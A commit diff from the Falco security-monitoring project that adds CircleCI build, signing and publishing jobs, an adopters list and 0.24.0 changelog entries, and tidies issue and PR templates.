docs: refinements to the release process docs

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
docs: 0.24.0 changelog entries
2026-03-20 19:52:08 +00:00 · 2020-07-16 16:38:15 +02:00 · 2020-07-16 16:38:15 +02:00 · 2020-07-15 18:33:50 +02:00 · 2020-07-15 18:33:50 +02:00 · 2020-07-15 18:33:50 +02:00
373 changed files with 10632 additions and 6188 deletions
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -0,0 +1,383 @@
+version: 2
+jobs:
+  # Build using ubuntu LTS
+  # This build is dynamic, most dependencies are taken from the OS
+  "build/ubuntu-focal":
+    docker:
+      - image: ubuntu:focal
+    steps:
+      - checkout
+      - run:
+          name: Update base image
+          command: apt update -y
+      - run:
+          name: Install dependencies
+          command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
+      - run:
+          name: Prepare project
+          command: |
+            mkdir build
+            pushd build
+            cmake -DBUILD_BPF=On ..
+            popd
+      - run:
+          name: Build
+          command: |
+            pushd build
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
+            popd
+      - run:
+          name: Run unit tests
+          command: |
+            pushd build
+            make tests
+            popd
+  # Debug build using ubuntu LTS
+  # This build is dynamic, most dependencies are taken from the OS
+  "build/ubuntu-focal-debug":
+    docker:
+      - image: ubuntu:focal
+    steps:
+      - checkout
+      - run:
+          name: Update base image
+          command: apt update -y
+      - run:
+          name: Install dependencies
+          command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
+      - run:
+          name: Prepare project
+          command: |
+            mkdir build
+            pushd build
+            cmake -DCMAKE_BUILD_TYPE=debug -DBUILD_BPF=On ..
+            popd
+      - run:
+          name: Build
+          command: |
+            pushd build
+            KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
+            popd
+      - run:
+          name: Run unit tests
+          command: |
+            pushd build
+            make tests
+            popd
+  # Build using our own builder base image using centos 7
+  # This build is static, dependencies are bundled in the falco binary
+  "build/centos7":
+    docker:
+      - image: falcosecurity/falco-builder:latest
+        environment:
+          BUILD_TYPE: "release"
+    steps:
+      - checkout:
+          path: /source/falco
+      - run:
+          name: Prepare project
+          command: /usr/bin/entrypoint cmake
+      - run:
+          name: Build
+          command: /usr/bin/entrypoint all
+      - run:
+          name: Run unit tests
+          command: /usr/bin/entrypoint tests
+      - run:
+          name: Build packages
+          command: /usr/bin/entrypoint package
+      - persist_to_workspace:
+          root: /
+          paths:
+            - build/release
+            - source
+      - run:
+          name: Prepare artifacts
+          command: |
+            mkdir -p /tmp/packages
+            cp /build/release/*.deb /tmp/packages
+            cp /build/release/*.tar.gz /tmp/packages
+            cp /build/release/*.rpm /tmp/packages
+      - store_artifacts:
+          path: /tmp/packages
+          destination: /packages
+  # Debug build using our own builder base image using centos 7
+  # This build is static, dependencies are bundled in the falco binary
+  "build/centos7-debug":
+    docker:
+      - image: falcosecurity/falco-builder:latest
+        environment:
+          BUILD_TYPE: "debug"
+    steps:
+      - checkout:
+          path: /source/falco
+      - run:
+          name: Prepare project
+          command: /usr/bin/entrypoint cmake
+      - run:
+          name: Build
+          command: /usr/bin/entrypoint all
+      - run:
+          name: Run unit tests
+          command: /usr/bin/entrypoint tests
+      - run:
+          name: Build packages
+          command: /usr/bin/entrypoint package
+  # Execute integration tests based on the build results coming from the "build/centos7" job
+  "tests/integration":
+    docker:
+      - image: falcosecurity/falco-tester:latest
+        environment:
+          SOURCE_DIR: "/source"
+          BUILD_DIR: "/build"
+          BUILD_TYPE: "release"
+    steps:
+      - setup_remote_docker
+      - attach_workspace:
+          at: /
+      - run:
+          name: Execute integration tests
+          command: /usr/bin/entrypoint test
+  "tests/driver-loader/integration":
+    machine:
+      image: ubuntu-1604:202004-01
+    steps:
+      - attach_workspace:
+          at: /tmp/ws
+      - run:
+          name: Execute driver-loader integration tests
+          command: /tmp/ws/source/falco/test/driver-loader/run_test.sh /tmp/ws/build/release/
+  # Sign rpm packages
+  "rpm/sign":
+    docker:
+      - image: falcosecurity/falco-builder:latest
+    steps:
+      - attach_workspace:
+          at: /
+      - run:
+          name: Install rpmsign
+          command: |
+            yum update -y
+            yum install rpm-sign -y
+      - run:
+          name: Sign rpm
+          command: |
+            echo "%_signature gpg" > ~/.rpmmacros
+            echo "%_gpg_name  Falcosecurity Package Signing" >> ~/.rpmmacros
+            cd /build/release/
+            echo '#!/usr/bin/expect -f' > sign
+            echo 'spawn rpmsign --addsign {*}$argv' >> sign
+            echo 'expect -exact "Enter pass phrase: "' >> sign
+            echo 'send -- "\n"' >> sign
+            echo 'expect eof' >> sign
+            chmod +x sign
+            echo $GPG_KEY | base64 -d | gpg --import
+            ./sign *.rpm
+            test "$(rpm -qpi *.rpm | awk '/Signature/' | grep -i none | wc -l)" -eq 0
+      - persist_to_workspace:
+          root: /
+          paths:
+            - build/release/*.rpm
+  # Publish the packages
+  "publish/packages-dev":
+    docker:
+      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
+    steps:
+      - attach_workspace:
+          at: /
+      - run:
+          name: Create versions
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt vs falcosecurity/deb-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
+            jfrog bt vs falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
+            jfrog bt vs falcosecurity/bin-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
+      - run:
+          name: Publish deb-dev
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb-dev/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
+      - run:
+          name: Publish rpm-dev
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
+      - run:
+          name: Publish tgz-dev
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin-dev/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
+  # Publish docker packages
+  "publish/docker-dev":
+    docker:
+      - image: docker:stable
+    steps:
+      - attach_workspace:
+          at: /
+      - checkout
+      - setup_remote_docker
+      - run:
+          name: Build and publish no-driver-dev
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco-no-driver:master docker/no-driver
+            docker tag falcosecurity/falco-no-driver:master falcosecurity/falco:master-slim
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push falcosecurity/falco-no-driver:master
+            docker push falcosecurity/falco:master-slim
+      - run:
+          name: Build and publish dev
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/falco
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push falcosecurity/falco:master
+      - run:
+          name: Build and publish dev falco-driver-loader-dev
+          command: |
+            docker build --build-arg FALCO_IMAGE_TAG=master -t falcosecurity/falco-driver-loader:master docker/driver-loader
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push falcosecurity/falco-driver-loader:master
+  # Publish the packages
+  "publish/packages":
+    docker:
+      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
+    steps:
+      - attach_workspace:
+          at: /
+      - run:
+          name: Create versions
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt vs falcosecurity/deb/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
+            jfrog bt vs falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
+            jfrog bt vs falcosecurity/bin/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
+      - run:
+          name: Publish deb
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
+      - run:
+          name: Publish rpm
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
+      - run:
+          name: Publish tgz
+          command: |
+            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
+            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
+  # Publish docker packages
+  "publish/docker":
+    docker:
+      - image: docker:stable
+    steps:
+      - attach_workspace:
+          at: /
+      - checkout
+      - setup_remote_docker
+      - run:
+          name: Build and publish no-driver
+          command: |
+            docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco-no-driver:${CIRCLE_TAG}" docker/no-driver
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" falcosecurity/falco-no-driver:latest
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:${CIRCLE_TAG}-slim"
+            docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:latest-slim"
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push "falcosecurity/falco-no-driver:${CIRCLE_TAG}"
+            docker push "falcosecurity/falco-no-driver:latest"
+            docker push "falcosecurity/falco:${CIRCLE_TAG}-slim"
+            docker push "falcosecurity/falco:latest-slim"
+      - run:
+          name: Build and publish falco
+          command: |
+            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/falco
+            docker tag "falcosecurity/falco:${CIRCLE_TAG}" falcosecurity/falco:latest
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push "falcosecurity/falco:${CIRCLE_TAG}"
+            docker push "falcosecurity/falco:latest"
+      - run:
+          name: Build and publish falco-driver-loader
+          command: |
+            docker build --build-arg FALCO_IMAGE_TAG=${CIRCLE_TAG} -t "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" docker/driver-loader
+            docker tag "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" falcosecurity/falco-driver-loader:latest
+            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
+            docker push "falcosecurity/falco-driver-loader:${CIRCLE_TAG}"
+            docker push "falcosecurity/falco-driver-loader:latest"
+workflows:
+  version: 2
+  build_and_test:
+    jobs:
+      - "build/ubuntu-focal"
+      - "build/ubuntu-focal-debug"
+      - "build/centos7"
+      - "build/centos7-debug"
+      - "tests/integration":
+          requires:
+            - "build/centos7"
+      - "tests/driver-loader/integration":
+          requires:
+            - "build/centos7"
+      - "rpm/sign":
+          context: falco
+          filters:
+            tags:
+              ignore: /.*/
+            branches:
+              only: master
+          requires:
+            - "tests/integration"
+      - "publish/packages-dev":
+          context: falco
+          filters:
+            tags:
+              ignore: /.*/
+            branches:
+              only: master
+          requires:
+            - "rpm/sign"
+      - "publish/docker-dev":
+          context: falco
+          filters:
+            tags:
+              ignore: /.*/
+            branches:
+              only: master
+          requires:
+            - "publish/packages-dev"
+            - "tests/driver-loader/integration"
+  release:
+    jobs:
+      - "build/centos7":
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
+      - "rpm/sign":
+          context: falco
+          requires:
+            - "build/centos7"
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
+      - "publish/packages":
+          context: falco
+          requires:
+            - "rpm/sign"
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
+      - "publish/docker":
+          context: falco
+          requires:
+            - "publish/packages"
+          filters:
+            tags:
+              only: /.*/
+            branches:
+              ignore: /.*/
--- a/.cmake-format
+++ b/.cmake-format
@@ -2,7 +2,7 @@
 # General Formatting Options
 # --------------------------
 # How wide to allow formatted cmake files
-line_width = 80
+line_width = 120

 # How many spaces to tab for indent
 tab_size = 2
@@ -116,4 +116,4 @@ input_encoding = 'utf-8'

 # Specify the encoding of the output file. Defaults to utf-8. Note that cmake
 # only claims to support utf-8 so be careful when using anything else
-output_encoding = 'utf-8'
+output_encoding = 'utf-8'
--- a/.github/ISSUE_TEMPLATE/bug-report.md
+++ b/.github/ISSUE_TEMPLATE/bug-report.md
@@ -1,28 +0,0 @@
---
-name: Bug Report
-about: Report a bug encountered while operating Falco
-labels: kind/bug
-
---
-
-<!-- Please use this template while reporting a bug and provide as much info as possible. Not doing so may result in your bug not being addressed in a timely manner. Thanks!
-
-If the matter is security related, please disclose it privately via https://falco.org/security/
-->
-
-**What happened**:
-
-**What you expected to happen**:
-
-**How to reproduce it (as minimally and precisely as possible)**:
-
-**Anything else we need to know?**:
-
-**Environment**:
- Falco version (use `falco --version`):
- System info <!-- Falco has a built-in support command you can use  "falco --support | jq .system_info" -->
- Cloud provider or hardware configuration:
- OS (e.g: `cat /etc/os-release`):
- Kernel (e.g. `uname -a`):
- Install tools (e.g. in kubernetes, rpm, deb, from source):
- Others:
--- a/.github/ISSUE_TEMPLATE/enhancement.md
+++ b/.github/ISSUE_TEMPLATE/enhancement.md
@@ -1,11 +0,0 @@
---
-name: Enhancement Request
-about: Suggest an enhancement to the Falco project
-labels: kind/feature
-
---
-<!-- Please only use this template for submitting enhancement requests -->
-
-**What would you like to be added**:
-
-**Why is this needed**:
--- a/.github/ISSUE_TEMPLATE/failing-tests.md
+++ b/.github/ISSUE_TEMPLATE/failing-tests.md
@@ -1,20 +0,0 @@
---
-name: Failing Test
-about: Report test failures in Falco CI jobs
-labels: kind/failing-test
-
---
-
-<!-- Please only use this template for submitting reports about failing tests in Falco CI jobs -->
-
-**Which jobs are failing**:
-
-**Which test(s) are failing**:
-
-**Since when has it been failing**:
-
-**Test link**:
-
-**Reason for failure**:
-
-**Anything else we need to know**:
--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -2,8 +2,8 @@

 1. If this is your first time, please read our contributor guidelines in the [CONTRIBUTING.md](CONTRIBUTING.md) file and learn how to compile Falco from source [here](https://falco.org/docs/source).
 2. Please label this pull request according to what type of issue you are addressing.
-5. Please add a release note!
-6. If the PR is unfinished while opening it specify a wip in the title before the actual title, for example, "wip: my awesome feature"
+3. . Please add a release note!
+4. If the PR is unfinished while opening it specify a wip in the title before the actual title, for example, "wip: my awesome feature"
 -->

 **What type of PR is this?**
@@ -22,27 +22,33 @@

 > /kind feature

-> /kind flaky-test
-
 > If contributing rules or changes to rules, please make sure to also uncomment one of the following line:

 > /kind rule-update

 > /kind rule-create

+<!--
+Please remove the leading whitespace before the `/kind <>` you uncommented.
+-->
+
 **Any specific area of the project related to this PR?**

 > Uncomment one (or more) `/area <>` lines:

+> /area build
+
 > /area engine

 > /area rules

-> /area deployment
+> /area tests

-> /area integrations
+> /area proposals

-> /area examples
+<!--
+Please remove the leading whitespace before the `/area <>` you uncommented.
+-->

 **What this PR does / why we need it**:

@@ -63,7 +69,8 @@ Fixes #
 <!--
 If no, just write "NONE" in the release-note block below.
 If yes, a release note is required:
-Enter your extended release note in the block below. If the PR requires additional action from users switching to the new release, prepend the string "action required:".
+Enter your extended release note in the block below.
+If the PR requires additional action from users switching to the new release, prepend the string "action required:".
 For example, `action required: change the API interface of the rule engine`.
 -->

--- a/.github/stale.yml
+++ b/.github/stale.yml
@@ -6,7 +6,6 @@ daysUntilClose: 7
 exemptLabels:
  - cncf
  - roadmap
-  - enhancement
  - "help wanted"
 # Label to use when marking an issue as stale
 staleLabel: wontfix
@@ -15,5 +14,7 @@ markComment: >
  This issue has been automatically marked as stale because it has not had
  recent activity. It will be closed if no further activity occurs. Thank you
  for your contributions.
+  Issues labeled "cncf", "roadmap" and "help wanted" will not be automatically closed.
+  Please refer to a maintainer to get such label added if you think this should be kept open.
 # Comment to post when closing a stale issue. Set to `false` to disable
-closeComment: false
+closeComment: false
--- a/.gitignore
+++ b/.gitignore
@@ -16,12 +16,8 @@ userspace/falco/lua/lpeg.so
 userspace/engine/lua/lyaml
 userspace/engine/lua/lyaml.lua

-docker/event-generator/event_generator
-docker/event-generator/mysqld
-docker/event-generator/httpd
-docker/event-generator/sha1sum
-docker/event-generator/vipw
-
 .vscode/*

-.luacheckcache
+.luacheckcache
+
+*.idea*
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,36 +0,0 @@
-#
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
-#
-# This file is part of falco .
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-language: cpp
-compiler: gcc
-env:
-    - BUILD_TYPE=debug
-    - BUILD_TYPE=release
-sudo: required
-services:
-    - docker
-before_install:
-    - sudo apt-get update
-install:
-    - export BRANCH=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then echo $TRAVIS_BRANCH; else echo $TRAVIS_PULL_REQUEST_BRANCH; fi)
-    - sudo apt-get install rpm linux-headers-$(uname -r) libelf-dev
-    - git clone https://github.com/draios/sysdig.git ../sysdig
-    # if available, use the branch with the same name in sysdig
-    - pushd ../sysdig && (git checkout "${BRANCH}" || exit 0) && echo "Using sysdig branch:" $(git rev-parse --abbrev-ref HEAD) && popd
-script:
-    - mkdir build
-    - ./scripts/build "${TRAVIS_BUILD_DIR}/.." "${TRAVIS_BUILD_DIR}/build"
--- a/ADOPTERS.md
+++ b/ADOPTERS.md
@@ -0,0 +1,30 @@
+# Adopters
+
+This is a list of production adopters of Falco (in alphabetical order):
+
+* [Booz Allen Hamilton](https://www.boozallen.com/) - BAH leverages Falco as part of their Kubernetes environment to verify that work loads behave as they did in their CD DevSecOps pipelines. BAH offers a solution to internal developers to easily build DevSecOps pipelines for projects. This makes it easy for developers to incorporate Security principles early on in the development cycle. In production, Falco is used to verify that the code the developer ships does not violate any of the production security requirements. BAH [are speaking at Kubecon NA 2019](https://kccncna19.sched.com/event/UaWr/building-reusable-devsecops-pipelines-on-a-secure-kubernetes-platform-steven-terrana-booz-allen-hamilton-michael-ducy-sysdig) on their use of Falco.
+
+* [Coveo](https://www.coveo.com/) - Coveo stitches together content and data, learning from every interaction, to tailor every experience using AI to drive growth, satisfy customers and develop employee proficiency. All Falco events are centralized in our SIEM for analysis. Understanding what is running on production servers, and the context around why things are running is even more tricky now that we have further abstractions with containers and orchestration systems. Falco is giving us a good visibility inside containers and complement other Host and Network Intrusion Detection Systems. In a near future, we expect to deploy serverless functions to take action when Falco identifies patterns worth taking action for.
+
+* [Frame.io](https://frame.io/) - Frame.io is a cloud-based (SaaS) video review and collaboration platform that enables users to securely upload source media, work-in-progress edits, dailies, and more into private workspaces where they can invite their team and clients to collaborate on projects. Understanding what is running on production servers, and the context around why things are running is even more tricky now that we have further abstractions like Docker and Kubernetes. To get this needed visibility into our system, we rely on Falco. Falco's ability to collect raw system calls such as open, connect, exec, along with their arguments offer key insights on what is happening on the production system and became the foundation of our intrusion detection and alerting system.
+
+* [GitLab](https://about.gitlab.com/direction/defend/container_host_security/) - GitLab is a complete DevOps platform, delivered as a single application, fundamentally changing the way Development, Security, and Ops teams collaborate. GitLab Ultimate provides the single tool teams need to find, triage, and fix vulnerabilities in applications, services, and cloud-native environments enabling them to manage their risk. This provides them with repeatable, defensible processes that automate security and compliance policies. GitLab includes a tight integration with Falco, allowing users to defend their containerized applications from attacks while running in production.
+
+* [League](https://league.com/ca/) - League provides health benefits management services to help employees understand and get the most from their benefits, and employers to provide effective, efficient plans. Falco is used to monitor our deployed services on Kubernetes, protecting against malicious access to containerswhich could lead to leaks of PHI or other sensitive data. The Falco alerts are logged in Stackdriver for grouping and further analysis. In the future, we're hoping for integrations with Prometheus and AlertManager as well.
+
+* [Logz.io](https://logz.io/) - Logz.io is a cloud observability platform for modern engineering teams. The Logz.io platform consists of three products — Log Management, Infrastructure Monitoring, and Cloud SIEM — that work together to unify the jobs of monitoring, troubleshooting, and security. We empower engineers to deliver better software by offering the world's most popular open source observability tools — the ELK Stack, Grafana, and Jaeger — in a single, easy to use, and powerful platform purpose-built for monitoring distributed cloud environments. Cloud SIEM supports data from multiple sources, including Falco's alerts, and offers useful rules and dashboards content to visualize and manage incidents across your systems in a unified UI.
+  * https://logz.io/blog/k8s-security-with-falco-and-cloud-siem/
+
+* [Preferral](https://www.preferral.com) - Preferral is a HIPAA-compliant platform for Referral Management and Online Referral Forms. Preferral streamlines the referral process for patients, specialists and their referral partners. By automating the referral process, referring practices spend less time on the phone, manual efforts are eliminated, and patients get the right care from the right specialist. Preferral leverages Falco to provide a Host Intrusion Detection System to meet their HIPPA compliance requirements.
+  * https://hipaa.preferral.com/01-preferral_hipaa_compliance/
+
+* [Shopify](https://www.shopify.com) - Shopify is the leading multi-channel commerce platform. Merchants use Shopify to design, set up, and manage their stores across multiple sales channels, including mobile, web, social media, marketplaces, brick-and-mortar locations, and pop-up shops. The platform also provides merchants with a powerful back-office and a single view of their business, from payments to shipping. The Shopify platform was engineered for reliability and scale, making enterprise-level technology available to businesses of all sizes. Shopify uses Falco to complement its Host and Network Intrusion Detection Systems.
+
+* [Sight Machine](https://www.sightmachine.com) - Sight Machine is the category leader for manufacturing analytics and used by Global 500 companies to make better, faster decisions about their operations. Sight Machine uses Falco to help enforce SOC2 compliance as well as a tool for real time security monitoring and alerting in Kubernetes.
+
+* [Skyscanner](https://www.skyscanner.net) - Skyscanner is the world's travel search engine for flights, hotels and car rentals. Most of our infrastructure is based on Kubernetes, and our Security team is using Falco to monitor anomalies at runtime, integrating Falco's findings with our internal ChatOps tooling to provide insight on the behavior of our machines in production. We also postprocess and store Falco's results to generate dashboards for auditing purposes.
+
+* [Sumo Logic](https://www.sumologic.com/) - Sumo Logic provides a SaaS based log aggregation service that provides dashboards and applications to easily identify and analyze problems in your application and infrastructure. Sumo Logic provides native integrations for many CNCF projects, such as Falco, that allows end users to easily collect Falco events and analyze Falco events on DecSecOps focused dashboards.
+
+*  [Sysdig](https://www.sysdig.com/) Sysdig originally created Falco in 2016 to detect unexpected or suspicious activity using a rules engine on top of the data that comes from the sysdig kernel system call probe. Sysdig provides tooling to help with vulnerability management, compliance, detection, incident response and forensics in Cloud-native environments. Sysdig Secure has extended falco to include: a rule library, the ability to update macros, lists & rules via the user interface and API, automated tuning of rules, and rule creation based on profiling known system behavior. On top of the basic Falco rules, Sysdig Secure implements the concept of a "Security policy" that can comprise several rules which are evaluated for a user-define infrastructure scope like Kubernetes namespaces, OpenShift clusters, deployment workload, cloud regions etc.
+
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,27 +2,434 @@

 This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).

+## v0.24.0
+
+Released on 2020-16-07
+
+### Major Changes
+
+* new: Falco now supports userspace instrumentation with the -u flag [[#1195](https://github.com/falcosecurity/falco/pull/1195)]
+* BREAKING CHANGE: --stats_interval is now --stats-interval [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
+* new: auto threadiness for gRPC server [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
+* BREAKING CHANGE: server streaming gRPC outputs method is now `falco.outputs.service/get` [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* new: new bi-directional async streaming gRPC outputs (`falco.outputs.service/sub`)  [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* new: unix socket for the gRPC server [[#1217](https://github.com/falcosecurity/falco/pull/1217)]
+
+
+### Minor Changes
+
+* update: driver version is 85c88952b018fdbce2464222c3303229f5bfcfad now [[#1305](https://github.com/falcosecurity/falco/pull/1305)]
+* update: `SKIP_MODULE_LOAD` renamed to `SKIP_DRIVER_LOADER` [[#1297](https://github.com/falcosecurity/falco/pull/1297)]
+* docs: add leogr to OWNERS [[#1300](https://github.com/falcosecurity/falco/pull/1300)]
+* update: default threadiness to 0 ("auto" behavior) [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
+* update: k8s audit endpoint now defaults to /k8s-audit everywhere [[#1292](https://github.com/falcosecurity/falco/pull/1292)]
+* update(falco.yaml): `webserver.k8s_audit_endpoint` default value changed from `/k8s_audit` to `/k8s-audit` [[#1261](https://github.com/falcosecurity/falco/pull/1261)]
+* docs(test): instructions to run regression test suites locally [[#1234](https://github.com/falcosecurity/falco/pull/1234)]
+
+
+### Bug Fixes
+
+* fix: --stats-interval correctly accepts values >= 999 (ms) [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
+* fix: make the eBPF driver build work on CentOS 8 [[#1301](https://github.com/falcosecurity/falco/pull/1301)]
+* fix(userspace/falco): correct options handling for `buffered_output: false` which was not honored for the `stdout` output [[#1296](https://github.com/falcosecurity/falco/pull/1296)]
+* fix(userspace/falco): honor -M also when using a trace file [[#1245](https://github.com/falcosecurity/falco/pull/1245)]
+* fix: high CPU usage when using server streaming gRPC outputs [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* fix: missing newline from some log messages (eg., token bucket depleted) [[#1257](https://github.com/falcosecurity/falco/pull/1257)]
+
+
+### Rule Changes
+
+* rule(Container Drift Detected (chmod)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
+* rule(Container Drift Detected (open+create)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
+* rule(Write below etc): allow snapd to write its unit files [[#1289](https://github.com/falcosecurity/falco/pull/1289)]
